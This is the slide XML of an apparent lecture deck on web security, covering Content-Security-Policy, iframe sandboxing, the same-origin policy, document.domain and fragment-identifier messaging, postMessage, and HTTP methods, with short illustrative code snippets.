          <p:cNvPr id="9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8505" y="1332937"/>
            <a:ext cx="6714990" cy="4928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7975" y="1339471"/>
            <a:ext cx="6416051" cy="4915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73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98" grpId="0" animBg="1" advAuto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CSP Example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5130" y="1484079"/>
            <a:ext cx="10515600" cy="3136655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</a:rPr>
              <a:t>Content-Security-Policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>src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ource Code Pro"/>
              </a:rPr>
              <a:t>*;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Source Code Pro"/>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>src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ource Code Pro"/>
              </a:rPr>
              <a:t>https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>'unsafe-inline'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Source Code Pro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Source Code Pro"/>
              </a:rPr>
              <a:t>'unsafe-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>https://*.akamaihd.net http://*.akamaihd.net *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>atlassolutions.com;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Source Code Pro"/>
              </a:rPr>
              <a:t>style-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>src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ource Code Pro"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Source Code Pro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Source Code Pro"/>
              </a:rPr>
              <a:t>'unsafe-inline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro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Source Code Pro"/>
              </a:rPr>
              <a:t>connect-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Source Code Pr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ource Code Pro"/>
              </a:rPr>
              <a:t>https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net wss://*.facebook.com:* ws://*.facebook.com:* http://*.akamaihd.net https://fb.scanandcleanlocal.com:* *.atlassolutions.com http://attachment.fbsbx.com https://attachment.fbsbx.com;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298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CSP gives developers a lot of power to improve the security of their site against XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But, uptake has been slow for a number of reasons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hard to deploy – e.g., moving all inline scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin granularity might be too coarse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary security decision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Recent measurements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>put CSP adoption at a fraction of a percent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Third-Party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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web apps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>often include third-party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Social widgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, advertisements, videos, games</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One option is to directly inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>this content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But, this gives complete access to the enclosing DOM and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(This is sometimes done for ads; why?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead, untrusted content can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>contained in an iframe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iframe provides separation between the top-level origin and third-party scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, this isolation isn't </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>perfect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framebusting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –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(top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self) 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top.location.replace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(location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HTML5 sandboxes represent a least-privilege approach to securing third-party scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows apps to specify only necessary privileges, and deny the rest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By default, all privileges are revoked and must be selectively enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Synthetic origin, different from enclosing origin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JS execution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window or dialog creation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No form submission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No plugins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Examples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0309" y="1744274"/>
            <a:ext cx="10636898" cy="67444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&lt;iframe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lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="BDB76B"/>
                </a:solidFill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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="65B042"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>‘http://example.com/widget’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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="BDB76B"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>sandbox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&gt;&lt;/iframe&gt;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0309" y="2748870"/>
            <a:ext cx="10636898" cy="67444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&lt;iframe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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="BDB76B"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>src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</a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="65B042"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>‘http://example.com/widget’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</a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="BDB76B"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="65B042"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>‘allow-forms’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</a:rPr>
              <a:t>&gt;&lt;/iframe&gt;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582956"/>
            <a:ext cx="10515600" cy="2450840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other allows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>allow-same-origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>allow-scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>allow-top-navigation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llow-popups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 has drawbacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plugins don't respect browser sandboxes and can bypass their restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disabling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>scripts, forms, and navigation implies that plugins must be disabled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many ads, videos, games use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>plugins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many more approaches to sandboxing JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Caja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FBJS2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AdJail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in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Security experts say the SOP isn’t strong enough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SOP assumes that all origins have equivalent capabilities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i.e. any origin may serve &lt;script&gt;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Leads to some XSS attacks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SOP doesn’t allow origins to specify constraints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i.e. &lt;scripts&gt; from any origin may POST to any other origin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Leads to some CSRF attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web developers say SOP is too restrictive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOP forbids XHR requests to other origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevents access to web APIs like Google Maps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forbids sharing with content between iframes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739673" y="2096278"/>
            <a:ext cx="2066759" cy="2425959"/>
            <a:chOff x="8739673" y="2226906"/>
            <a:chExt cx="2066759" cy="2425959"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Right Brace 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8739673" y="2226906"/>
              <a:ext cx="566058" cy="2425959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79429" y="3024386"/>
              <a:ext cx="1227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CSP</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>sandbox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39673" y="4851918"/>
            <a:ext cx="2667885" cy="1265853"/>
            <a:chOff x="8739673" y="4851918"/>
            <a:chExt cx="2667885" cy="1265853"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Right Brace 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8739673" y="4851918"/>
              <a:ext cx="566058" cy="1265853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79429" y="5069345"/>
              <a:ext cx="1828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postMessage</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>CORS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71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Cross-Frame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Developers increasingly want to communicate with other content in a page across frames with different origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., login.bank.io and payments.bank.io</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Widgets included from third parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, SOP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>prevents this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Several mechanisms have been used to implement cross-frame messaging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – unsafe hack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fragment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>identifiers – unsafe hack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() – preferred solution, HTML5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Hierarchy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="pasted-image.pdf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80456" y="1241023"/>
            <a:ext cx="8478417" cy="5440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9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document.domain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A, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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'login.bank.com'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.domain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'bank.com'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B, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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'payments.bank.com'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.domain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'bank.com'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  <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D7391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Origins may remove subdomains prefixes from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>.domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>modifications allow cross-frame access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two frames modify 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.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to a common suffix (top-level domain)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP checks use the modified domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scheme and port must still match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example of mutual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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HTTP Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="102" name="Table 102"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1771487952"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2652664" y="1579478"/>
          <a:ext cx="7961789" cy="4952534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88790"/>
                <a:gridCol w="6472999"/>
              </a:tblGrid>
              <a:tr h="357188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</a:tr>
              <a:tr h="48525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GET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Retrieve resource at a given path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HEAD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Identical to a GET, but response omits body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80599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POST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Submit data to a given path, might create resources as new paths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90661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PUT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Submit data to a given path, creating resource if it exists or modifying existing resource at that path</a:t>
                      </a:r>
                      <a:endParaRPr sz="18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DELETE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Deletes resource at a given path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TRACE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Echoes request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OPTIONS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Returns supported HTTP methods given a path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CONNECT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Creates a tunnel to a given network location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document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can break SOP access for other content that came from the original origin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.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not safe when multiple parties share a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/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 Origin A, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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document.domain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0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‘luke.blogspot.com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.domain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'blogspot.com'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 Origin B, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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document.domain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0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‘leia.blogspot.com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.domain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'blogspot.com'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 Origin C, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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document.domain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= 'vader.blogspot.com'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.domain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'blogspot.com'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914400" lvl="0" indent="0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Untrusted origin C now has access to A and B...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.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> grants complete access to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2930"/>
            <a:ext cx="10515600" cy="3729717"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-frame communication via abuse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of fragment identifiers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Given a reference, a frame can set (but not read) another frame's location, even from a different origin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framebusting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --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(top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self) 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top.location.replace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(location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dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setting a frame's URL fragment doesn't cause it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>reload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57470" y="1500713"/>
            <a:ext cx="9724650" cy="1343317"/>
            <a:chOff x="1057470" y="1500713"/>
            <a:chExt cx="9724650" cy="1343317"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1057470" y="2320810"/>
              <a:ext cx="9724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http://example.com:8080/path/to/resource?key=value#fragment</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800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1532550" y="1725976"/>
              <a:ext cx="230156" cy="959512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/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="2986568" y="1282774"/>
              <a:ext cx="230156" cy="1845915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4381641" y="1775886"/>
              <a:ext cx="230156" cy="859689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6058680" y="958537"/>
              <a:ext cx="230156" cy="2494385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16200000">
              <a:off x="8162298" y="1419878"/>
              <a:ext cx="230067" cy="1571614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 rot="16200000">
              <a:off x="9733913" y="1419742"/>
              <a:ext cx="230067" cy="1571614"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 40765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323" y="1504826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Scheme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02151" y="1512708"/>
              <a:ext cx="9989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Domain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4934" y="1500713"/>
              <a:ext cx="62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Port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6521" y="1512708"/>
              <a:ext cx="654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Path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3756" y="1500713"/>
              <a:ext cx="82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Query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57085" y="1500713"/>
              <a:ext cx="1183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Fragment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8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967911"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Communicating Via Fragment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4161"/>
            <a:ext cx="10515600" cy="5863130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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A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window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.frames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].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location.hash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'blah'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B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while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true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window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.location.hash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fragment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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window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.location.hash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window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.location.hash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''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Do something with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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the fragment...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lvl="0" indent="0" defTabSz="352043">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="266700" algn="l"/>
                <a:tab pos="546100" algn="l"/>
                <a:tab pos="812800" algn="l"/>
                <a:tab pos="1092200" algn="l"/>
                <a:tab pos="1358900" algn="l"/>
                <a:tab pos="1638300" algn="l"/>
                <a:tab pos="1905000" algn="l"/>
                <a:tab pos="2184400" algn="l"/>
                <a:tab pos="2463800" algn="l"/>
                <a:tab pos="2730500" algn="l"/>
                <a:tab pos="3009900" algn="l"/>
                <a:tab pos="32766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Origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A changes fragment identifier for origin B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin B polls the fragment identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On changes, it interprets the identifier as a message and computes on it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Polling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is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authenticity of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sender or 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postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> API is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML5 API to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>allow secure cross-frame messaging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sending a message is only possible if a frame handle can be acquired</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The capability security model in action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser ensures that the receiver has the expected origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
